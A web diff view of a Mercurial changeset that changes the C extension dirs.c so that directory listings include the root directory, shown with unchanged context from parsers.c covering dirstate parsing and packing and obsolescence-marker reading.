##// END OF EJS Templates
util: make util.dirs() and util.finddirs() include root directory (API)...
Martin von Zweigbergk -
r42915:d8e55c0c default
parent child Browse files
Show More
@@ -1,316 +1,319
1 1 /*
2 2 dirs.c - dynamic directory diddling for dirstates
3 3
4 4 Copyright 2013 Facebook
5 5
6 6 This software may be used and distributed according to the terms of
7 7 the GNU General Public License, incorporated herein by reference.
8 8 */
9 9
10 10 #define PY_SSIZE_T_CLEAN
11 11 #include <Python.h>
12 12
13 13 #include "util.h"
14 14
15 15 #ifdef IS_PY3K
16 16 #define PYLONG_VALUE(o) ((PyLongObject *)o)->ob_digit[1]
17 17 #else
18 18 #define PYLONG_VALUE(o) PyInt_AS_LONG(o)
19 19 #endif
20 20
21 21 /*
22 22 * This is a multiset of directory names, built from the files that
23 23 * appear in a dirstate or manifest.
24 24 *
25 25 * A few implementation notes:
26 26 *
27 27 * We modify Python integers for refcounting, but those integers are
28 28 * never visible to Python code.
29 29 *
30 30 * We mutate strings in-place, but leave them immutable once they can
31 31 * be seen by Python code.
32 32 */
33 33 typedef struct {
34 34 PyObject_HEAD
35 35 PyObject *dict;
36 36 } dirsObject;
37 37
38 38 static inline Py_ssize_t _finddir(const char *path, Py_ssize_t pos)
39 39 {
40 40 while (pos != -1) {
41 41 if (path[pos] == '/')
42 42 break;
43 43 pos -= 1;
44 44 }
45 if (pos == -1) {
46 return 0;
47 }
45 48
46 49 return pos;
47 50 }
48 51
49 52 static int _addpath(PyObject *dirs, PyObject *path)
50 53 {
51 54 const char *cpath = PyBytes_AS_STRING(path);
52 55 Py_ssize_t pos = PyBytes_GET_SIZE(path);
53 56 PyObject *key = NULL;
54 57 int ret = -1;
55 58
56 59 /* This loop is super critical for performance. That's why we inline
57 60 * access to Python structs instead of going through a supported API.
58 61 * The implementation, therefore, is heavily dependent on CPython
59 62 * implementation details. We also commit violations of the Python
60 63 * "protocol" such as mutating immutable objects. But since we only
61 64 * mutate objects created in this function or in other well-defined
62 65 * locations, the references are known so these violations should go
63 66 * unnoticed. The code for adjusting the length of a PyBytesObject is
64 67 * essentially a minimal version of _PyBytes_Resize. */
65 68 while ((pos = _finddir(cpath, pos - 1)) != -1) {
66 69 PyObject *val;
67 70
68 71 /* It's likely that every prefix already has an entry
69 72 in our dict. Try to avoid allocating and
70 73 deallocating a string for each prefix we check. */
71 74 if (key != NULL)
72 75 ((PyBytesObject *)key)->ob_shash = -1;
73 76 else {
74 77 /* Force Python to not reuse a small shared string. */
75 78 key = PyBytes_FromStringAndSize(cpath,
76 79 pos < 2 ? 2 : pos);
77 80 if (key == NULL)
78 81 goto bail;
79 82 }
80 83 /* Py_SIZE(o) refers to the ob_size member of the struct. Yes,
81 84 * assigning to what looks like a function seems wrong. */
82 85 Py_SIZE(key) = pos;
83 86 ((PyBytesObject *)key)->ob_sval[pos] = '\0';
84 87
85 88 val = PyDict_GetItem(dirs, key);
86 89 if (val != NULL) {
87 90 PYLONG_VALUE(val) += 1;
88 91 break;
89 92 }
90 93
91 94 /* Force Python to not reuse a small shared int. */
92 95 #ifdef IS_PY3K
93 96 val = PyLong_FromLong(0x1eadbeef);
94 97 #else
95 98 val = PyInt_FromLong(0x1eadbeef);
96 99 #endif
97 100
98 101 if (val == NULL)
99 102 goto bail;
100 103
101 104 PYLONG_VALUE(val) = 1;
102 105 ret = PyDict_SetItem(dirs, key, val);
103 106 Py_DECREF(val);
104 107 if (ret == -1)
105 108 goto bail;
106 109 Py_CLEAR(key);
107 110 }
108 111 ret = 0;
109 112
110 113 bail:
111 114 Py_XDECREF(key);
112 115
113 116 return ret;
114 117 }
115 118
116 119 static int _delpath(PyObject *dirs, PyObject *path)
117 120 {
118 121 char *cpath = PyBytes_AS_STRING(path);
119 122 Py_ssize_t pos = PyBytes_GET_SIZE(path);
120 123 PyObject *key = NULL;
121 124 int ret = -1;
122 125
123 126 while ((pos = _finddir(cpath, pos - 1)) != -1) {
124 127 PyObject *val;
125 128
126 129 key = PyBytes_FromStringAndSize(cpath, pos);
127 130
128 131 if (key == NULL)
129 132 goto bail;
130 133
131 134 val = PyDict_GetItem(dirs, key);
132 135 if (val == NULL) {
133 136 PyErr_SetString(PyExc_ValueError,
134 137 "expected a value, found none");
135 138 goto bail;
136 139 }
137 140
138 141 if (--PYLONG_VALUE(val) <= 0) {
139 142 if (PyDict_DelItem(dirs, key) == -1)
140 143 goto bail;
141 144 } else
142 145 break;
143 146 Py_CLEAR(key);
144 147 }
145 148 ret = 0;
146 149
147 150 bail:
148 151 Py_XDECREF(key);
149 152
150 153 return ret;
151 154 }
152 155
153 156 static int dirs_fromdict(PyObject *dirs, PyObject *source, char skipchar)
154 157 {
155 158 PyObject *key, *value;
156 159 Py_ssize_t pos = 0;
157 160
158 161 while (PyDict_Next(source, &pos, &key, &value)) {
159 162 if (!PyBytes_Check(key)) {
160 163 PyErr_SetString(PyExc_TypeError, "expected string key");
161 164 return -1;
162 165 }
163 166 if (skipchar) {
164 167 if (!dirstate_tuple_check(value)) {
165 168 PyErr_SetString(PyExc_TypeError,
166 169 "expected a dirstate tuple");
167 170 return -1;
168 171 }
169 172 if (((dirstateTupleObject *)value)->state == skipchar)
170 173 continue;
171 174 }
172 175
173 176 if (_addpath(dirs, key) == -1)
174 177 return -1;
175 178 }
176 179
177 180 return 0;
178 181 }
179 182
180 183 static int dirs_fromiter(PyObject *dirs, PyObject *source)
181 184 {
182 185 PyObject *iter, *item = NULL;
183 186 int ret;
184 187
185 188 iter = PyObject_GetIter(source);
186 189 if (iter == NULL)
187 190 return -1;
188 191
189 192 while ((item = PyIter_Next(iter)) != NULL) {
190 193 if (!PyBytes_Check(item)) {
191 194 PyErr_SetString(PyExc_TypeError, "expected string");
192 195 break;
193 196 }
194 197
195 198 if (_addpath(dirs, item) == -1)
196 199 break;
197 200 Py_CLEAR(item);
198 201 }
199 202
200 203 ret = PyErr_Occurred() ? -1 : 0;
201 204 Py_DECREF(iter);
202 205 Py_XDECREF(item);
203 206 return ret;
204 207 }
205 208
206 209 /*
207 210 * Calculate a refcounted set of directory names for the files in a
208 211 * dirstate.
209 212 */
210 213 static int dirs_init(dirsObject *self, PyObject *args)
211 214 {
212 215 PyObject *dirs = NULL, *source = NULL;
213 216 char skipchar = 0;
214 217 int ret = -1;
215 218
216 219 self->dict = NULL;
217 220
218 221 if (!PyArg_ParseTuple(args, "|Oc:__init__", &source, &skipchar))
219 222 return -1;
220 223
221 224 dirs = PyDict_New();
222 225
223 226 if (dirs == NULL)
224 227 return -1;
225 228
226 229 if (source == NULL)
227 230 ret = 0;
228 231 else if (PyDict_Check(source))
229 232 ret = dirs_fromdict(dirs, source, skipchar);
230 233 else if (skipchar)
231 234 PyErr_SetString(PyExc_ValueError,
232 235 "skip character is only supported "
233 236 "with a dict source");
234 237 else
235 238 ret = dirs_fromiter(dirs, source);
236 239
237 240 if (ret == -1)
238 241 Py_XDECREF(dirs);
239 242 else
240 243 self->dict = dirs;
241 244
242 245 return ret;
243 246 }
244 247
245 248 PyObject *dirs_addpath(dirsObject *self, PyObject *args)
246 249 {
247 250 PyObject *path;
248 251
249 252 if (!PyArg_ParseTuple(args, "O!:addpath", &PyBytes_Type, &path))
250 253 return NULL;
251 254
252 255 if (_addpath(self->dict, path) == -1)
253 256 return NULL;
254 257
255 258 Py_RETURN_NONE;
256 259 }
257 260
258 261 static PyObject *dirs_delpath(dirsObject *self, PyObject *args)
259 262 {
260 263 PyObject *path;
261 264
262 265 if (!PyArg_ParseTuple(args, "O!:delpath", &PyBytes_Type, &path))
263 266 return NULL;
264 267
265 268 if (_delpath(self->dict, path) == -1)
266 269 return NULL;
267 270
268 271 Py_RETURN_NONE;
269 272 }
270 273
271 274 static int dirs_contains(dirsObject *self, PyObject *value)
272 275 {
273 276 return PyBytes_Check(value) ? PyDict_Contains(self->dict, value) : 0;
274 277 }
275 278
276 279 static void dirs_dealloc(dirsObject *self)
277 280 {
278 281 Py_XDECREF(self->dict);
279 282 PyObject_Del(self);
280 283 }
281 284
282 285 static PyObject *dirs_iter(dirsObject *self)
283 286 {
284 287 return PyObject_GetIter(self->dict);
285 288 }
286 289
287 290 static PySequenceMethods dirs_sequence_methods;
288 291
289 292 static PyMethodDef dirs_methods[] = {
290 293 {"addpath", (PyCFunction)dirs_addpath, METH_VARARGS, "add a path"},
291 294 {"delpath", (PyCFunction)dirs_delpath, METH_VARARGS, "remove a path"},
292 295 {NULL} /* Sentinel */
293 296 };
294 297
295 298 static PyTypeObject dirsType = { PyVarObject_HEAD_INIT(NULL, 0) };
296 299
297 300 void dirs_module_init(PyObject *mod)
298 301 {
299 302 dirs_sequence_methods.sq_contains = (objobjproc)dirs_contains;
300 303 dirsType.tp_name = "parsers.dirs";
301 304 dirsType.tp_new = PyType_GenericNew;
302 305 dirsType.tp_basicsize = sizeof(dirsObject);
303 306 dirsType.tp_dealloc = (destructor)dirs_dealloc;
304 307 dirsType.tp_as_sequence = &dirs_sequence_methods;
305 308 dirsType.tp_flags = Py_TPFLAGS_DEFAULT;
306 309 dirsType.tp_doc = "dirs";
307 310 dirsType.tp_iter = (getiterfunc)dirs_iter;
308 311 dirsType.tp_methods = dirs_methods;
309 312 dirsType.tp_init = (initproc)dirs_init;
310 313
311 314 if (PyType_Ready(&dirsType) < 0)
312 315 return;
313 316 Py_INCREF(&dirsType);
314 317
315 318 PyModule_AddObject(mod, "dirs", (PyObject *)&dirsType);
316 319 }
@@ -1,762 +1,762
1 1 /*
2 2 parsers.c - efficient content parsing
3 3
4 4 Copyright 2008 Matt Mackall <mpm@selenic.com> and others
5 5
6 6 This software may be used and distributed according to the terms of
7 7 the GNU General Public License, incorporated herein by reference.
8 8 */
9 9
10 10 #define PY_SSIZE_T_CLEAN
11 11 #include <Python.h>
12 12 #include <ctype.h>
13 13 #include <stddef.h>
14 14 #include <string.h>
15 15
16 16 #include "bitmanipulation.h"
17 17 #include "charencode.h"
18 18 #include "util.h"
19 19
20 20 #ifdef IS_PY3K
21 21 /* The mapping of Python types is meant to be temporary to get Python
22 22 * 3 to compile. We should remove this once Python 3 support is fully
23 23 * supported and proper types are used in the extensions themselves. */
24 24 #define PyInt_Check PyLong_Check
25 25 #define PyInt_FromLong PyLong_FromLong
26 26 #define PyInt_FromSsize_t PyLong_FromSsize_t
27 27 #define PyInt_AsLong PyLong_AsLong
28 28 #endif
29 29
30 30 static const char *const versionerrortext = "Python minor version mismatch";
31 31
32 32 static PyObject *dict_new_presized(PyObject *self, PyObject *args)
33 33 {
34 34 Py_ssize_t expected_size;
35 35
36 36 if (!PyArg_ParseTuple(args, "n:make_presized_dict", &expected_size)) {
37 37 return NULL;
38 38 }
39 39
40 40 return _dict_new_presized(expected_size);
41 41 }
42 42
43 43 static inline dirstateTupleObject *make_dirstate_tuple(char state, int mode,
44 44 int size, int mtime)
45 45 {
46 46 dirstateTupleObject *t =
47 47 PyObject_New(dirstateTupleObject, &dirstateTupleType);
48 48 if (!t) {
49 49 return NULL;
50 50 }
51 51 t->state = state;
52 52 t->mode = mode;
53 53 t->size = size;
54 54 t->mtime = mtime;
55 55 return t;
56 56 }
57 57
58 58 static PyObject *dirstate_tuple_new(PyTypeObject *subtype, PyObject *args,
59 59 PyObject *kwds)
60 60 {
61 61 /* We do all the initialization here and not a tp_init function because
62 62 * dirstate_tuple is immutable. */
63 63 dirstateTupleObject *t;
64 64 char state;
65 65 int size, mode, mtime;
66 66 if (!PyArg_ParseTuple(args, "ciii", &state, &mode, &size, &mtime)) {
67 67 return NULL;
68 68 }
69 69
70 70 t = (dirstateTupleObject *)subtype->tp_alloc(subtype, 1);
71 71 if (!t) {
72 72 return NULL;
73 73 }
74 74 t->state = state;
75 75 t->mode = mode;
76 76 t->size = size;
77 77 t->mtime = mtime;
78 78
79 79 return (PyObject *)t;
80 80 }
81 81
82 82 static void dirstate_tuple_dealloc(PyObject *o)
83 83 {
84 84 PyObject_Del(o);
85 85 }
86 86
87 87 static Py_ssize_t dirstate_tuple_length(PyObject *o)
88 88 {
89 89 return 4;
90 90 }
91 91
92 92 static PyObject *dirstate_tuple_item(PyObject *o, Py_ssize_t i)
93 93 {
94 94 dirstateTupleObject *t = (dirstateTupleObject *)o;
95 95 switch (i) {
96 96 case 0:
97 97 return PyBytes_FromStringAndSize(&t->state, 1);
98 98 case 1:
99 99 return PyInt_FromLong(t->mode);
100 100 case 2:
101 101 return PyInt_FromLong(t->size);
102 102 case 3:
103 103 return PyInt_FromLong(t->mtime);
104 104 default:
105 105 PyErr_SetString(PyExc_IndexError, "index out of range");
106 106 return NULL;
107 107 }
108 108 }
109 109
110 110 static PySequenceMethods dirstate_tuple_sq = {
111 111 dirstate_tuple_length, /* sq_length */
112 112 0, /* sq_concat */
113 113 0, /* sq_repeat */
114 114 dirstate_tuple_item, /* sq_item */
115 115 0, /* sq_ass_item */
116 116 0, /* sq_contains */
117 117 0, /* sq_inplace_concat */
118 118 0 /* sq_inplace_repeat */
119 119 };
120 120
121 121 PyTypeObject dirstateTupleType = {
122 122 PyVarObject_HEAD_INIT(NULL, 0) /* header */
123 123 "dirstate_tuple", /* tp_name */
124 124 sizeof(dirstateTupleObject), /* tp_basicsize */
125 125 0, /* tp_itemsize */
126 126 (destructor)dirstate_tuple_dealloc, /* tp_dealloc */
127 127 0, /* tp_print */
128 128 0, /* tp_getattr */
129 129 0, /* tp_setattr */
130 130 0, /* tp_compare */
131 131 0, /* tp_repr */
132 132 0, /* tp_as_number */
133 133 &dirstate_tuple_sq, /* tp_as_sequence */
134 134 0, /* tp_as_mapping */
135 135 0, /* tp_hash */
136 136 0, /* tp_call */
137 137 0, /* tp_str */
138 138 0, /* tp_getattro */
139 139 0, /* tp_setattro */
140 140 0, /* tp_as_buffer */
141 141 Py_TPFLAGS_DEFAULT, /* tp_flags */
142 142 "dirstate tuple", /* tp_doc */
143 143 0, /* tp_traverse */
144 144 0, /* tp_clear */
145 145 0, /* tp_richcompare */
146 146 0, /* tp_weaklistoffset */
147 147 0, /* tp_iter */
148 148 0, /* tp_iternext */
149 149 0, /* tp_methods */
150 150 0, /* tp_members */
151 151 0, /* tp_getset */
152 152 0, /* tp_base */
153 153 0, /* tp_dict */
154 154 0, /* tp_descr_get */
155 155 0, /* tp_descr_set */
156 156 0, /* tp_dictoffset */
157 157 0, /* tp_init */
158 158 0, /* tp_alloc */
159 159 dirstate_tuple_new, /* tp_new */
160 160 };
161 161
162 162 static PyObject *parse_dirstate(PyObject *self, PyObject *args)
163 163 {
164 164 PyObject *dmap, *cmap, *parents = NULL, *ret = NULL;
165 165 PyObject *fname = NULL, *cname = NULL, *entry = NULL;
166 166 char state, *cur, *str, *cpos;
167 167 int mode, size, mtime;
168 168 unsigned int flen, pos = 40;
169 169 Py_ssize_t len = 40;
170 170 Py_ssize_t readlen;
171 171
172 172 if (!PyArg_ParseTuple(
173 173 args, PY23("O!O!s#:parse_dirstate", "O!O!y#:parse_dirstate"),
174 174 &PyDict_Type, &dmap, &PyDict_Type, &cmap, &str, &readlen)) {
175 175 goto quit;
176 176 }
177 177
178 178 len = readlen;
179 179
180 180 /* read parents */
181 181 if (len < 40) {
182 182 PyErr_SetString(PyExc_ValueError,
183 183 "too little data for parents");
184 184 goto quit;
185 185 }
186 186
187 187 parents = Py_BuildValue(PY23("s#s#", "y#y#"), str, (Py_ssize_t)20,
188 188 str + 20, (Py_ssize_t)20);
189 189 if (!parents) {
190 190 goto quit;
191 191 }
192 192
193 193 /* read filenames */
194 194 while (pos >= 40 && pos < len) {
195 195 if (pos + 17 > len) {
196 196 PyErr_SetString(PyExc_ValueError,
197 197 "overflow in dirstate");
198 198 goto quit;
199 199 }
200 200 cur = str + pos;
201 201 /* unpack header */
202 202 state = *cur;
203 203 mode = getbe32(cur + 1);
204 204 size = getbe32(cur + 5);
205 205 mtime = getbe32(cur + 9);
206 206 flen = getbe32(cur + 13);
207 207 pos += 17;
208 208 cur += 17;
209 209 if (flen > len - pos) {
210 210 PyErr_SetString(PyExc_ValueError,
211 211 "overflow in dirstate");
212 212 goto quit;
213 213 }
214 214
215 215 entry =
216 216 (PyObject *)make_dirstate_tuple(state, mode, size, mtime);
217 217 cpos = memchr(cur, 0, flen);
218 218 if (cpos) {
219 219 fname = PyBytes_FromStringAndSize(cur, cpos - cur);
220 220 cname = PyBytes_FromStringAndSize(
221 221 cpos + 1, flen - (cpos - cur) - 1);
222 222 if (!fname || !cname ||
223 223 PyDict_SetItem(cmap, fname, cname) == -1 ||
224 224 PyDict_SetItem(dmap, fname, entry) == -1) {
225 225 goto quit;
226 226 }
227 227 Py_DECREF(cname);
228 228 } else {
229 229 fname = PyBytes_FromStringAndSize(cur, flen);
230 230 if (!fname ||
231 231 PyDict_SetItem(dmap, fname, entry) == -1) {
232 232 goto quit;
233 233 }
234 234 }
235 235 Py_DECREF(fname);
236 236 Py_DECREF(entry);
237 237 fname = cname = entry = NULL;
238 238 pos += flen;
239 239 }
240 240
241 241 ret = parents;
242 242 Py_INCREF(ret);
243 243 quit:
244 244 Py_XDECREF(fname);
245 245 Py_XDECREF(cname);
246 246 Py_XDECREF(entry);
247 247 Py_XDECREF(parents);
248 248 return ret;
249 249 }
250 250
251 251 /*
252 252 * Build a set of non-normal and other parent entries from the dirstate dmap
253 253 */
254 254 static PyObject *nonnormalotherparententries(PyObject *self, PyObject *args)
255 255 {
256 256 PyObject *dmap, *fname, *v;
257 257 PyObject *nonnset = NULL, *otherpset = NULL, *result = NULL;
258 258 Py_ssize_t pos;
259 259
260 260 if (!PyArg_ParseTuple(args, "O!:nonnormalentries", &PyDict_Type,
261 261 &dmap)) {
262 262 goto bail;
263 263 }
264 264
265 265 nonnset = PySet_New(NULL);
266 266 if (nonnset == NULL) {
267 267 goto bail;
268 268 }
269 269
270 270 otherpset = PySet_New(NULL);
271 271 if (otherpset == NULL) {
272 272 goto bail;
273 273 }
274 274
275 275 pos = 0;
276 276 while (PyDict_Next(dmap, &pos, &fname, &v)) {
277 277 dirstateTupleObject *t;
278 278 if (!dirstate_tuple_check(v)) {
279 279 PyErr_SetString(PyExc_TypeError,
280 280 "expected a dirstate tuple");
281 281 goto bail;
282 282 }
283 283 t = (dirstateTupleObject *)v;
284 284
285 285 if (t->state == 'n' && t->size == -2) {
286 286 if (PySet_Add(otherpset, fname) == -1) {
287 287 goto bail;
288 288 }
289 289 }
290 290
291 291 if (t->state == 'n' && t->mtime != -1) {
292 292 continue;
293 293 }
294 294 if (PySet_Add(nonnset, fname) == -1) {
295 295 goto bail;
296 296 }
297 297 }
298 298
299 299 result = Py_BuildValue("(OO)", nonnset, otherpset);
300 300 if (result == NULL) {
301 301 goto bail;
302 302 }
303 303 Py_DECREF(nonnset);
304 304 Py_DECREF(otherpset);
305 305 return result;
306 306 bail:
307 307 Py_XDECREF(nonnset);
308 308 Py_XDECREF(otherpset);
309 309 Py_XDECREF(result);
310 310 return NULL;
311 311 }
312 312
313 313 /*
314 314 * Efficiently pack a dirstate object into its on-disk format.
315 315 */
316 316 static PyObject *pack_dirstate(PyObject *self, PyObject *args)
317 317 {
318 318 PyObject *packobj = NULL;
319 319 PyObject *map, *copymap, *pl, *mtime_unset = NULL;
320 320 Py_ssize_t nbytes, pos, l;
321 321 PyObject *k, *v = NULL, *pn;
322 322 char *p, *s;
323 323 int now;
324 324
325 325 if (!PyArg_ParseTuple(args, "O!O!O!i:pack_dirstate", &PyDict_Type, &map,
326 326 &PyDict_Type, &copymap, &PyTuple_Type, &pl,
327 327 &now)) {
328 328 return NULL;
329 329 }
330 330
331 331 if (PyTuple_Size(pl) != 2) {
332 332 PyErr_SetString(PyExc_TypeError, "expected 2-element tuple");
333 333 return NULL;
334 334 }
335 335
336 336 /* Figure out how much we need to allocate. */
337 337 for (nbytes = 40, pos = 0; PyDict_Next(map, &pos, &k, &v);) {
338 338 PyObject *c;
339 339 if (!PyBytes_Check(k)) {
340 340 PyErr_SetString(PyExc_TypeError, "expected string key");
341 341 goto bail;
342 342 }
343 343 nbytes += PyBytes_GET_SIZE(k) + 17;
344 344 c = PyDict_GetItem(copymap, k);
345 345 if (c) {
346 346 if (!PyBytes_Check(c)) {
347 347 PyErr_SetString(PyExc_TypeError,
348 348 "expected string key");
349 349 goto bail;
350 350 }
351 351 nbytes += PyBytes_GET_SIZE(c) + 1;
352 352 }
353 353 }
354 354
355 355 packobj = PyBytes_FromStringAndSize(NULL, nbytes);
356 356 if (packobj == NULL) {
357 357 goto bail;
358 358 }
359 359
360 360 p = PyBytes_AS_STRING(packobj);
361 361
362 362 pn = PyTuple_GET_ITEM(pl, 0);
363 363 if (PyBytes_AsStringAndSize(pn, &s, &l) == -1 || l != 20) {
364 364 PyErr_SetString(PyExc_TypeError, "expected a 20-byte hash");
365 365 goto bail;
366 366 }
367 367 memcpy(p, s, l);
368 368 p += 20;
369 369 pn = PyTuple_GET_ITEM(pl, 1);
370 370 if (PyBytes_AsStringAndSize(pn, &s, &l) == -1 || l != 20) {
371 371 PyErr_SetString(PyExc_TypeError, "expected a 20-byte hash");
372 372 goto bail;
373 373 }
374 374 memcpy(p, s, l);
375 375 p += 20;
376 376
377 377 for (pos = 0; PyDict_Next(map, &pos, &k, &v);) {
378 378 dirstateTupleObject *tuple;
379 379 char state;
380 380 int mode, size, mtime;
381 381 Py_ssize_t len, l;
382 382 PyObject *o;
383 383 char *t;
384 384
385 385 if (!dirstate_tuple_check(v)) {
386 386 PyErr_SetString(PyExc_TypeError,
387 387 "expected a dirstate tuple");
388 388 goto bail;
389 389 }
390 390 tuple = (dirstateTupleObject *)v;
391 391
392 392 state = tuple->state;
393 393 mode = tuple->mode;
394 394 size = tuple->size;
395 395 mtime = tuple->mtime;
396 396 if (state == 'n' && mtime == now) {
397 397 /* See pure/parsers.py:pack_dirstate for why we do
398 398 * this. */
399 399 mtime = -1;
400 400 mtime_unset = (PyObject *)make_dirstate_tuple(
401 401 state, mode, size, mtime);
402 402 if (!mtime_unset) {
403 403 goto bail;
404 404 }
405 405 if (PyDict_SetItem(map, k, mtime_unset) == -1) {
406 406 goto bail;
407 407 }
408 408 Py_DECREF(mtime_unset);
409 409 mtime_unset = NULL;
410 410 }
411 411 *p++ = state;
412 412 putbe32((uint32_t)mode, p);
413 413 putbe32((uint32_t)size, p + 4);
414 414 putbe32((uint32_t)mtime, p + 8);
415 415 t = p + 12;
416 416 p += 16;
417 417 len = PyBytes_GET_SIZE(k);
418 418 memcpy(p, PyBytes_AS_STRING(k), len);
419 419 p += len;
420 420 o = PyDict_GetItem(copymap, k);
421 421 if (o) {
422 422 *p++ = '\0';
423 423 l = PyBytes_GET_SIZE(o);
424 424 memcpy(p, PyBytes_AS_STRING(o), l);
425 425 p += l;
426 426 len += l + 1;
427 427 }
428 428 putbe32((uint32_t)len, t);
429 429 }
430 430
431 431 pos = p - PyBytes_AS_STRING(packobj);
432 432 if (pos != nbytes) {
433 433 PyErr_Format(PyExc_SystemError, "bad dirstate size: %ld != %ld",
434 434 (long)pos, (long)nbytes);
435 435 goto bail;
436 436 }
437 437
438 438 return packobj;
439 439 bail:
440 440 Py_XDECREF(mtime_unset);
441 441 Py_XDECREF(packobj);
442 442 Py_XDECREF(v);
443 443 return NULL;
444 444 }
445 445
446 446 #define BUMPED_FIX 1
447 447 #define USING_SHA_256 2
448 448 #define FM1_HEADER_SIZE (4 + 8 + 2 + 2 + 1 + 1 + 1)
449 449
450 450 static PyObject *readshas(const char *source, unsigned char num,
451 451 Py_ssize_t hashwidth)
452 452 {
453 453 int i;
454 454 PyObject *list = PyTuple_New(num);
455 455 if (list == NULL) {
456 456 return NULL;
457 457 }
458 458 for (i = 0; i < num; i++) {
459 459 PyObject *hash = PyBytes_FromStringAndSize(source, hashwidth);
460 460 if (hash == NULL) {
461 461 Py_DECREF(list);
462 462 return NULL;
463 463 }
464 464 PyTuple_SET_ITEM(list, i, hash);
465 465 source += hashwidth;
466 466 }
467 467 return list;
468 468 }
469 469
470 470 static PyObject *fm1readmarker(const char *databegin, const char *dataend,
471 471 uint32_t *msize)
472 472 {
473 473 const char *data = databegin;
474 474 const char *meta;
475 475
476 476 double mtime;
477 477 int16_t tz;
478 478 uint16_t flags;
479 479 unsigned char nsuccs, nparents, nmetadata;
480 480 Py_ssize_t hashwidth = 20;
481 481
482 482 PyObject *prec = NULL, *parents = NULL, *succs = NULL;
483 483 PyObject *metadata = NULL, *ret = NULL;
484 484 int i;
485 485
486 486 if (data + FM1_HEADER_SIZE > dataend) {
487 487 goto overflow;
488 488 }
489 489
490 490 *msize = getbe32(data);
491 491 data += 4;
492 492 mtime = getbefloat64(data);
493 493 data += 8;
494 494 tz = getbeint16(data);
495 495 data += 2;
496 496 flags = getbeuint16(data);
497 497 data += 2;
498 498
499 499 if (flags & USING_SHA_256) {
500 500 hashwidth = 32;
501 501 }
502 502
503 503 nsuccs = (unsigned char)(*data++);
504 504 nparents = (unsigned char)(*data++);
505 505 nmetadata = (unsigned char)(*data++);
506 506
507 507 if (databegin + *msize > dataend) {
508 508 goto overflow;
509 509 }
510 510 dataend = databegin + *msize; /* narrow down to marker size */
511 511
512 512 if (data + hashwidth > dataend) {
513 513 goto overflow;
514 514 }
515 515 prec = PyBytes_FromStringAndSize(data, hashwidth);
516 516 data += hashwidth;
517 517 if (prec == NULL) {
518 518 goto bail;
519 519 }
520 520
521 521 if (data + nsuccs * hashwidth > dataend) {
522 522 goto overflow;
523 523 }
524 524 succs = readshas(data, nsuccs, hashwidth);
525 525 if (succs == NULL) {
526 526 goto bail;
527 527 }
528 528 data += nsuccs * hashwidth;
529 529
530 530 if (nparents == 1 || nparents == 2) {
531 531 if (data + nparents * hashwidth > dataend) {
532 532 goto overflow;
533 533 }
534 534 parents = readshas(data, nparents, hashwidth);
535 535 if (parents == NULL) {
536 536 goto bail;
537 537 }
538 538 data += nparents * hashwidth;
539 539 } else {
540 540 parents = Py_None;
541 541 Py_INCREF(parents);
542 542 }
543 543
544 544 if (data + 2 * nmetadata > dataend) {
545 545 goto overflow;
546 546 }
547 547 meta = data + (2 * nmetadata);
548 548 metadata = PyTuple_New(nmetadata);
549 549 if (metadata == NULL) {
550 550 goto bail;
551 551 }
552 552 for (i = 0; i < nmetadata; i++) {
553 553 PyObject *tmp, *left = NULL, *right = NULL;
554 554 Py_ssize_t leftsize = (unsigned char)(*data++);
555 555 Py_ssize_t rightsize = (unsigned char)(*data++);
556 556 if (meta + leftsize + rightsize > dataend) {
557 557 goto overflow;
558 558 }
559 559 left = PyBytes_FromStringAndSize(meta, leftsize);
560 560 meta += leftsize;
561 561 right = PyBytes_FromStringAndSize(meta, rightsize);
562 562 meta += rightsize;
563 563 tmp = PyTuple_New(2);
564 564 if (!left || !right || !tmp) {
565 565 Py_XDECREF(left);
566 566 Py_XDECREF(right);
567 567 Py_XDECREF(tmp);
568 568 goto bail;
569 569 }
570 570 PyTuple_SET_ITEM(tmp, 0, left);
571 571 PyTuple_SET_ITEM(tmp, 1, right);
572 572 PyTuple_SET_ITEM(metadata, i, tmp);
573 573 }
574 574 ret = Py_BuildValue("(OOHO(di)O)", prec, succs, flags, metadata, mtime,
575 575 (int)tz * 60, parents);
576 576 goto bail; /* return successfully */
577 577
578 578 overflow:
579 579 PyErr_SetString(PyExc_ValueError, "overflow in obsstore");
580 580 bail:
581 581 Py_XDECREF(prec);
582 582 Py_XDECREF(succs);
583 583 Py_XDECREF(metadata);
584 584 Py_XDECREF(parents);
585 585 return ret;
586 586 }
587 587
588 588 static PyObject *fm1readmarkers(PyObject *self, PyObject *args)
589 589 {
590 590 const char *data, *dataend;
591 591 Py_ssize_t datalen, offset, stop;
592 592 PyObject *markers = NULL;
593 593
594 594 if (!PyArg_ParseTuple(args, PY23("s#nn", "y#nn"), &data, &datalen,
595 595 &offset, &stop)) {
596 596 return NULL;
597 597 }
598 598 if (offset < 0) {
599 599 PyErr_SetString(PyExc_ValueError,
600 600 "invalid negative offset in fm1readmarkers");
601 601 return NULL;
602 602 }
603 603 if (stop > datalen) {
604 604 PyErr_SetString(
605 605 PyExc_ValueError,
606 606 "stop longer than data length in fm1readmarkers");
607 607 return NULL;
608 608 }
609 609 dataend = data + datalen;
610 610 data += offset;
611 611 markers = PyList_New(0);
612 612 if (!markers) {
613 613 return NULL;
614 614 }
615 615 while (offset < stop) {
616 616 uint32_t msize;
617 617 int error;
618 618 PyObject *record = fm1readmarker(data, dataend, &msize);
619 619 if (!record) {
620 620 goto bail;
621 621 }
622 622 error = PyList_Append(markers, record);
623 623 Py_DECREF(record);
624 624 if (error) {
625 625 goto bail;
626 626 }
627 627 data += msize;
628 628 offset += msize;
629 629 }
630 630 return markers;
631 631 bail:
632 632 Py_DECREF(markers);
633 633 return NULL;
634 634 }
635 635
636 636 static char parsers_doc[] = "Efficient content parsing.";
637 637
638 638 PyObject *encodedir(PyObject *self, PyObject *args);
639 639 PyObject *pathencode(PyObject *self, PyObject *args);
640 640 PyObject *lowerencode(PyObject *self, PyObject *args);
641 641 PyObject *parse_index2(PyObject *self, PyObject *args);
642 642
643 643 static PyMethodDef methods[] = {
644 644 {"pack_dirstate", pack_dirstate, METH_VARARGS, "pack a dirstate\n"},
645 645 {"nonnormalotherparententries", nonnormalotherparententries, METH_VARARGS,
646 646 "create a set containing non-normal and other parent entries of given "
647 647 "dirstate\n"},
648 648 {"parse_dirstate", parse_dirstate, METH_VARARGS, "parse a dirstate\n"},
649 649 {"parse_index2", parse_index2, METH_VARARGS, "parse a revlog index\n"},
650 650 {"isasciistr", isasciistr, METH_VARARGS, "check if an ASCII string\n"},
651 651 {"asciilower", asciilower, METH_VARARGS, "lowercase an ASCII string\n"},
652 652 {"asciiupper", asciiupper, METH_VARARGS, "uppercase an ASCII string\n"},
